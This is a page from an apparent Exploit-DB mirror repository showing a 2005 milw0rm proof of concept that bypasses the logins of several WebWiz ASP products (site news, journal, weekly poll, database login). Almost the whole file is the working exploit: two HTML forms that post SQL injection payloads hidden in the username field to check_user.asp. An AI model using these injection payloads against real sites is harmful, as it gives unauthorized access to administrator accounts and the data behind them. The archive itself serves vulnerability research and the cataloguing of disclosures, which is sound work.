bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/asp/webapps/1399.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

37 lines
No EOL
1.6 KiB
Text
Raw Permalink Blame History

<!--
Vulnerable products :
webwiz site news access2000 : vesion 3.06 and prior versions
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions
Proof of Concepts :
-->
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union all select '1','1' from tblConfiguration where ''='">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union select 1 from tblusers where''='">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
# milw0rm.com [2005-12-30]
Reference in a new issue View git blame Copy permalink